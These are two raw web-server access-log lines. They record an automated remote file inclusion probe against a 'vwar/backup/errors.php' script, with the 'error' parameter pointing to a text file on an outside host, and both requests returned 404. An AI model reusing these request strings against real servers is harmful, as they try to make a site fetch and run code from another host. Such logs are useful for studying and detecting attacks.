210.239.42.208 - - [08/May/2009:02:18:36 -0400] "GET /logs/access_log.Q108090900///vwar/backup/errors.php?error=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
210.239.42.208 - - [08/May/2009:02:18:36 -0400] "GET ///vwar/backup/errors.php?error=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
